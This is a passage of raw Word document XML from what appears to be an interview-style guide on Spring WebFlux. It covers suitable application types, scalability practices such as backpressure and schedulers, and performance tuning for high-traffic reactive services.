      </w:r>
    </w:p>
    <w:p w14:paraId="08357B23"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504"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4EC39F7F" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06C194C2"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B747BF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hoice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="5EFCC8E6" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41CAA7E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igh-throughput, async systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1697F77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tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3A9E79CD" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B3FC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atabase-heavy, CRUD-based enterprise apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE66430"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MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D7C965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352" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0A7F4" w14:textId="1BFB0F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0" w:name="_Toc197867764"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What type of applications are best suited for Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="550"/>
    </w:p>
    <w:p w14:paraId="079182BC" w14:textId="1F6F8E8D" w:rsidR="003421E9" w:rsidRPr="00B13F85" w:rsidRDefault="003421E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est suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous, non-blocking, event-driven applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high scalability and low resource usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are critical. Below are the types of applications where WebFlux really shines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74512D67"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8F1675">
          <v:rect id="_x0000_i2353" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947B0B7"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Suited Application Types for Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5356AF"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High-Concurrency APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E318197"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icroservices needing to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thousands of concurrent requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C456E2D"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Public APIs, payment gateways, API gateways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA0728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reaming &amp; Real-Time Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C56E8D4"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use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Server-Sent Events (SS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or continuous data streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2EFEFB"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Chat apps, live analytics dashboards, stock ticker feeds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8C7A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O-Bound Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59108E7C"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making multiple remote API/database calls where waiting on responses would block threads in a traditional model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B37210E"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Aggregators calling multiple third-party services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFC1983"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ctive Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6B812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 services and databases (like MongoDB with Reactive Streams or R2DBC) are reactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46380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Event-driven microservices in a distributed system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DFC78C"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loud-Native &amp; Containerized Apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F7147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are deployed in environments like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernet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WS Lambda</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zure Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc., where </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8BB1A"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ow-Latency Event-Driven Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8E8BD2"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s that require near real-time processing of data with minimal latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996B3A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Fraud detection engines, streaming data pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578037C"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5D861C">
          <v:rect id="_x0000_i2354" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A8DC1"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Recommended for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238CF98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databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like JPA/Hibernate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724EB19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with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001165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CRUD</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations where Spring MVC is simpler and more mature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF060F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355" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5D282" w14:textId="4061A5B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1" w:name="_Toc197867765"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you ensure scalability in a reactive Spring WebFlux application</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="551"/>
    </w:p>
    <w:p w14:paraId="4C99C9F4" w14:textId="04D51B07" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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ensure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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive Spring WebFlux application</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, efficient </w:t>
      </w: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 end-to-end integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's how it's done:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E56E35"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2C0A52">
          <v:rect id="_x0000_i2356" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C1B58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I/O Across the Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005EDB5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for HTTP calls (instead of RestTemplate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52102D8E"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instead of blocking JDBC or JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B081D8"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Thread.sleep(), synchronized, and blocking code inside reactive chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B721AD9"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4B272">
          <v:rect id="_x0000_i2357" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="637CFFC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Reactive Backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E36C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a fast producer doesn't overwhelm a slow consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18398D27"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 onBackpressureBuffer(), or onBackpressureDrop() in Flux where necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8BE7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8EA444">
          <v:rect id="_x0000_i2358" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E10A37"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Optimize Thread Usage with Schedulers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551D86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ubscribeOn(Schedulers.boundedElastic()) for blocking tasks (e.g., file I/O).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE74A3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publishOn() to control downstream thread execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716402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unnecessary context switches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7BF6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0B147">
          <v:rect id="_x0000_i2359" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67BFB2"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Use Efficient Data Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5031D63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Flux for paginated or large data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F50CC6"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loading all data into memory at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF7D243"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CDDABD6">
          <v:rect id="_x0000_i2360" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A0F0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Monitor and Tune with Reactive Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2EA23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tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10B27B"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ck event loop utilization, dropped messages, queue size, and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9BBE26"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160FAE">
          <v:rect id="_x0000_i2361" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA8AC0"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Gateway Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209C4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ffload client-specific concerns (rate limiting, retries) using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PI Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC4AA7B"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43F15">
          <v:rect id="_x0000_i2362" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD292C"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Apply Proper Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1337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onErrorResume(), retry(), timeout(), etc., to build resilient pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300FEB5E"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D4DD4D">
          <v:rect id="_x0000_i2363" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC54325"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Enable Load Balancing &amp; Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ADE604"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loy WebFlux apps behind a load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015DFFCC"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WebFlux uses fewer threads, it benefits from horizontal scaling even more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2AEE82"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A9030">
          <v:rect id="_x0000_i2364" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="200CA9F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Avoid Mixing Blocking with Non-Blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E0A1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ver mix blocking libraries (JDBC, synchronous APIs) with reactive code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0F2B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must, isolate such operations using Schedulers.boundedElastic().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA84E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365" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F97ABF" w14:textId="29982EE8"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52" w:name="_Toc197867766"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you optimize the performance of a WebFlux application with high traffic</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="552"/>
    </w:p>
    <w:p w14:paraId="726D147A" w14:textId="2A441C25" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optimize performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux application under high traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, focus on keeping it </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fully non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, tuning </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and building for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive resilience</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's a practical breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB77658"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23A39">
          <v:rect id="_x0000_i2366" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243E8B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Libraries End-to-End</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624340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stead of RestTemplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4907581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Mongo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of JDBC/JPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB3D1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ing I/O like file reads or third-party SDKs (use Schedulers.boundedElastic() if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F2F01F"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208982">
          <v:rect id="_x0000_i2367" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2B68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Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850DD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n) or .onBackpressureBuffer() in Flux to avoid out-of-memory errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71472D76"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downstream consumers can control the flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7FB2E"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7E9D0">
          <v:rect id="_x0000_i2368" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C028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Threading and Schedulers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9E7B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parallel() for CPU-intensive work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99FAF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boundedElastic() for blocking code (sparingly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DC022"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inimize the number of publishOn/subscribeOn switches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3900892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1A322">
          <v:rect id="_x0000_i2369" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64999A5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Optimize Reactive Chains</w:t>
      </w:r>
    </w:p>
